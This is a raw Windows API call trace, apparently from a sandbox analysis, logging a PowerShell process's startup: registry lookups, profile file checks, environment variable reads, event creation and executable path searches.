	[0414.689] CoTaskMemAlloc (cb=0x5a) returned 0x1b7901f0
	[0414.689] RegQueryValueExW (in: hKey=0x33c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28dc4c, lpData=0x1b7901f0, lpcbData=0x28dc48*=0x56 | out: lpType=0x28dc4c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x28dc48*=0x56) returned 0x0
	[0414.689] CoTaskMemFree (pv=0x1b7901f0) 
	[0414.689] RegCloseKey (hKey=0x33c) returned 0x0
	[0414.690] CoTaskMemAlloc (cb=0x20c) returned 0x1b760970
	[0414.690] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b760970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0414.690] CoTaskMemFree (pv=0x1b760970) 
	[0414.690] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x28d8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0414.690] CoTaskMemAlloc (cb=0x20c) returned 0x1b760970
	[0414.690] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b760970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0414.690] CoTaskMemFree (pv=0x1b760970) 
	[0414.690] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x28d8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0414.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x28da50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0414.691] SetErrorMode (uMode=0x1) returned 0x1
	[0414.691] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x28dc60 | out: lpFileInformation=0x28dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0414.691] SetErrorMode (uMode=0x1) returned 0x1
	[0414.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x28da50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0414.691] SetErrorMode (uMode=0x1) returned 0x1
	[0414.691] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x28dc60 | out: lpFileInformation=0x28dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0414.691] SetErrorMode (uMode=0x1) returned 0x1
	[0414.691] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x28da50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0414.691] SetErrorMode (uMode=0x1) returned 0x1
	[0414.691] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x28dc60 | out: lpFileInformation=0x28dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0414.692] SetErrorMode (uMode=0x1) returned 0x1
	[0414.692] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x28da50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0414.692] SetErrorMode (uMode=0x1) returned 0x1
	[0414.692] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x28dc60 | out: lpFileInformation=0x28dc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0414.692] SetErrorMode (uMode=0x1) returned 0x1
	[0414.692] CoTaskMemAlloc (cb=0x104) returned 0x1480e0
	[0414.692] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1480e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0414.692] CoTaskMemFree (pv=0x1480e0) 
	[0414.693] CoTaskMemAlloc (cb=0x104) returned 0x1480e0
	[0414.693] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1480e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0414.693] CoTaskMemFree (pv=0x1480e0) 
	[0414.696] CoTaskMemAlloc (cb=0x104) returned 0x1480e0
	[0414.696] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1480e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0414.696] CoTaskMemFree (pv=0x1480e0) 
	[0415.120] CoTaskMemAlloc (cb=0x104) returned 0x1480e0
	[0415.120] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1480e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0415.120] CoTaskMemFree (pv=0x1480e0) 
	[0415.125] CoTaskMemAlloc (cb=0x104) returned 0x1480e0
	[0415.125] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1480e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0415.125] CoTaskMemFree (pv=0x1480e0) 
	[0415.127] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x33c
	[0415.127] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x340
	[0415.127] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x344
	[0415.127] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1c8
	[0415.127] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x330
	[0415.127] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x1cc
	[0415.127] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x30c
	[0415.127] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x380
	[0415.127] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x384
	[0415.127] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x334
	[0415.127] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x350
	[0415.127] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x354
	[0415.129] CoTaskMemAlloc (cb=0x104) returned 0x1480e0
	[0415.129] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1480e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0415.129] CoTaskMemFree (pv=0x1480e0) 
	[0415.132] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0415.132] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x28de40 | out: lpMode=0x28de40) returned 1
	[0415.133] CoTaskMemAlloc (cb=0x104) returned 0x1480e0
	[0415.134] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1480e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0415.134] CoTaskMemFree (pv=0x1480e0) 
	[0415.137] SetEvent (hEvent=0x1c8) returned 1
	[0415.137] SetEvent (hEvent=0x33c) returned 1
	[0415.137] SetEvent (hEvent=0x340) returned 1
	[0415.137] SetEvent (hEvent=0x344) returned 1
	[0415.137] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x358
	[0415.139] CoTaskMemAlloc (cb=0x104) returned 0x1480e0
	[0415.139] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1480e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0415.139] CoTaskMemFree (pv=0x1480e0) 
	[0415.140] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x28db98 | out: phkResult=0x28db98*=0x35c) returned 0x0
	[0415.140] RegQueryValueExW (in: hKey=0x35c, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x28db1c, lpData=0x0, lpcbData=0x28db18*=0x0 | out: lpType=0x28db1c*=0x0, lpData=0x0, lpcbData=0x28db18*=0x0) returned 0x2

Thread:
	id = 213
	os_tid = 0xc30


Thread:
	id = 230
	os_tid = 0xcb8


Thread:
	id = 455
	os_tid = 0x1114


Thread:
	id = 468
	os_tid = 0x1164


Thread:
	id = 469
	os_tid = 0x1168

	[0370.095] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0396.166] LocalFree (hMem=0xe7290) returned 0x0
	[0396.166] CloseHandle (hObject=0x320) returned 1
	[0396.166] CloseHandle (hObject=0x13) returned 1
	[0396.166] CloseHandle (hObject=0xf) returned 1
	[0396.167] RegCloseKey (hKey=0x30c) returned 0x0
	[0396.167] RegCloseKey (hKey=0x308) returned 0x0
	[0396.167] RegCloseKey (hKey=0x304) returned 0x0
	[0396.167] LocalFree (hMem=0xe7260) returned 0x0
	[0396.167] RegCloseKey (hKey=0x330) returned 0x0
	[0399.628] RegCloseKey (hKey=0x330) returned 0x0
	[0405.132] RegCloseKey (hKey=0x320) returned 0x0
	[0405.132] RegCloseKey (hKey=0x30c) returned 0x0
	[0405.132] RegCloseKey (hKey=0x1cc) returned 0x0
	[0405.132] RegCloseKey (hKey=0x330) returned 0x0
	[0405.132] RegCloseKey (hKey=0x1c8) returned 0x0
	[0405.133] RegCloseKey (hKey=0x344) returned 0x0
	[0405.133] RegCloseKey (hKey=0x340) returned 0x0
	[0405.133] RegCloseKey (hKey=0x33c) returned 0x0
	[0405.133] RegCloseKey (hKey=0x338) returned 0x0
	[0405.134] RegCloseKey (hKey=0x334) returned 0x0
	[0411.394] RegCloseKey (hKey=0x37c) returned 0x0
	[0411.394] RegCloseKey (hKey=0x378) returned 0x0
	[0411.394] RegCloseKey (hKey=0x374) returned 0x0
	[0411.396] RegCloseKey (hKey=0x370) returned 0x0
	[0411.397] RegCloseKey (hKey=0x320) returned 0x0
	[0411.397] RegCloseKey (hKey=0x388) returned 0x0
	[0411.397] RegCloseKey (hKey=0x368) returned 0x0
	[0411.398] RegCloseKey (hKey=0x364) returned 0x0
	[0411.398] RegCloseKey (hKey=0x360) returned 0x0
	[0411.398] RegCloseKey (hKey=0x35c) returned 0x0
	[0411.398] RegCloseKey (hKey=0x358) returned 0x0
	[0411.398] RegCloseKey (hKey=0x354) returned 0x0
	[0411.399] RegCloseKey (hKey=0x350) returned 0x0
	[0411.399] RegCloseKey (hKey=0x334) returned 0x0
	[0411.399] RegCloseKey (hKey=0x384) returned 0x0
	[0411.399] RegCloseKey (hKey=0x380) returned 0x0
	[0411.400] RegCloseKey (hKey=0x30c) returned 0x0
	[0411.400] RegCloseKey (hKey=0x1cc) returned 0x0
	[0411.400] RegCloseKey (hKey=0x330) returned 0x0
	[0411.400] RegCloseKey (hKey=0x1c8) returned 0x0
	[0411.401] RegCloseKey (hKey=0x344) returned 0x0
	[0411.401] RegCloseKey (hKey=0x340) returned 0x0
	[0411.401] RegCloseKey (hKey=0x33c) returned 0x0
	[0411.401] RegCloseKey (hKey=0x338) returned 0x0
	[0641.440] RegCloseKey (hKey=0x35c) returned 0x0

Thread:
	id = 578
	os_tid = 0xb9c


Thread:
	id = 619
	os_tid = 0xfc8

	[0415.416] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0415.419] SetThreadUILanguage (LangId=0x0) returned 0x7fffff00409
	[0415.424] CoTaskMemAlloc (cb=0x104) returned 0x1480e0
	[0415.424] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1480e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0415.424] CoTaskMemFree (pv=0x1480e0) 
	[0415.425] VirtualQuery (in: lpAddress=0x1c70d760, lpBuffer=0x1c70e620, dwLength=0x30 | out: lpBuffer=0x1c70e620*(BaseAddress=0x1c70d000, AllocationBase=0x1bd80000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0415.428] CoTaskMemAlloc (cb=0x104) returned 0x1480e0
	[0415.428] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1480e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0415.428] CoTaskMemFree (pv=0x1480e0) 
	[0415.430] CoTaskMemAlloc (cb=0x104) returned 0x1480e0
	[0415.430] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1480e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0415.430] CoTaskMemFree (pv=0x1480e0) 
	[0415.433] CoTaskMemAlloc (cb=0x104) returned 0x1480e0
	[0415.433] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1480e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0415.433] CoTaskMemFree (pv=0x1480e0) 
	[0415.441] CoTaskMemAlloc (cb=0x104) returned 0x1480e0
	[0415.441] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1480e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0415.441] CoTaskMemFree (pv=0x1480e0) 
	[0415.443] CoTaskMemAlloc (cb=0x104) returned 0x1480e0
	[0415.443] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1480e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0415.443] CoTaskMemFree (pv=0x1480e0) 
	[0415.444] CoTaskMemAlloc (cb=0x104) returned 0x1480e0
	[0415.444] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1480e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0415.445] CoTaskMemFree (pv=0x1480e0) 
	[0415.449] VirtualQuery (in: lpAddress=0x1c70da10, lpBuffer=0x1c70e8d0, dwLength=0x30 | out: lpBuffer=0x1c70e8d0*(BaseAddress=0x1c70d000, AllocationBase=0x1bd80000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0415.450] CoTaskMemAlloc (cb=0x104) returned 0x1480e0
	[0415.450] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1480e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0415.450] CoTaskMemFree (pv=0x1480e0) 
	[0415.452] CoTaskMemAlloc (cb=0x104) returned 0x1480e0
	[0415.452] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1480e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0415.452] CoTaskMemFree (pv=0x1480e0) 
	[0415.453] CoTaskMemAlloc (cb=0x104) returned 0x1480e0
	[0415.453] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1480e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0415.453] CoTaskMemFree (pv=0x1480e0) 
	[0415.454] CoTaskMemAlloc (cb=0x104) returned 0x1480e0
	[0415.454] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1480e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0415.454] CoTaskMemFree (pv=0x1480e0) 
	[0415.459] CoTaskMemAlloc (cb=0x104) returned 0x1480e0
	[0415.459] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1480e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0415.459] CoTaskMemFree (pv=0x1480e0) 
	[0416.210] CoTaskMemAlloc (cb=0x104) returned 0x1480e0
	[0416.210] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1480e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0416.210] CoTaskMemFree (pv=0x1480e0) 
	[0416.212] CoTaskMemAlloc (cb=0x104) returned 0x1480e0
	[0416.212] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1480e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0416.212] CoTaskMemFree (pv=0x1480e0) 
	[0416.213] CoTaskMemAlloc (cb=0x104) returned 0x1480e0
	[0416.213] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1480e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0416.214] CoTaskMemFree (pv=0x1480e0) 
	[0416.216] CoTaskMemAlloc (cb=0x104) returned 0x1480e0
	[0416.216] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1480e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0416.216] CoTaskMemFree (pv=0x1480e0) 
	[0416.218] CoTaskMemAlloc (cb=0x104) returned 0x1480e0
	[0416.218] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1480e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0416.218] CoTaskMemFree (pv=0x1480e0) 
	[0416.219] CoTaskMemAlloc (cb=0x104) returned 0x1480e0
	[0416.219] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1480e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0416.219] CoTaskMemFree (pv=0x1480e0) 
	[0416.221] CoTaskMemAlloc (cb=0x104) returned 0x1480e0
	[0416.221] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1480e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0416.221] CoTaskMemFree (pv=0x1480e0) 
	[0416.237] CoTaskMemAlloc (cb=0x104) returned 0x1480e0
	[0416.237] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1480e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0416.237] CoTaskMemFree (pv=0x1480e0) 
	[0416.935] CoTaskMemAlloc (cb=0x104) returned 0x1480e0
	[0416.935] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1480e0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0416.935] CoTaskMemFree (pv=0x1480e0) 
	[0416.938] CoTaskMemAlloc (cb=0x104) returned 0x1480e0
	[0416.938] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x1480e0, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0416.938] CoTaskMemFree (pv=0x1480e0) 
	[0416.938] CoTaskMemAlloc (cb=0x128) returned 0x13d960
	[0416.938] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13d960, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0416.938] CoTaskMemFree (pv=0x13d960) 
	[0416.943] CoTaskMemAlloc (cb=0x20e) returned 0x1b7625e0
	[0416.943] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b7625e0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0416.943] CoTaskMemFree (pv=0x1b7625e0) 
	[0416.948] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c70d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0416.949] SetErrorMode (uMode=0x1) returned 0x1
	[0416.952] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c70d940 | out: lpFindFileData=0x1c70d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0417.232] SetErrorMode (uMode=0x1) returned 0x1
	[0417.233] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c70d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0417.234] SetErrorMode (uMode=0x1) returned 0x1
	[0417.234] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c70d940 | out: lpFindFileData=0x1c70d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0417.242] SetErrorMode (uMode=0x1) returned 0x1
	[0417.243] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c70d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0417.243] SetErrorMode (uMode=0x1) returned 0x1
	[0417.243] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c70d940 | out: lpFindFileData=0x1c70d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0417.251] SetErrorMode (uMode=0x1) returned 0x1
	[0417.253] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c70d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0417.253] SetErrorMode (uMode=0x1) returned 0x1
	[0417.253] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c70d940 | out: lpFindFileData=0x1c70d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0417.261] SetErrorMode (uMode=0x1) returned 0x1
	[0417.263] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c70d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0417.263] SetErrorMode (uMode=0x1) returned 0x1
	[0417.263] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c70d940 | out: lpFindFileData=0x1c70d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0417.271] SetErrorMode (uMode=0x1) returned 0x1
	[0417.636] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c70d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0417.636] SetErrorMode (uMode=0x1) returned 0x1
	[0417.636] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.BAT", lpFindFileData=0x1c70d940 | out: lpFindFileData=0x1c70d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0417.644] SetErrorMode (uMode=0x1) returned 0x1
	[0417.645] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c70d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0417.645] SetErrorMode (uMode=0x1) returned 0x1
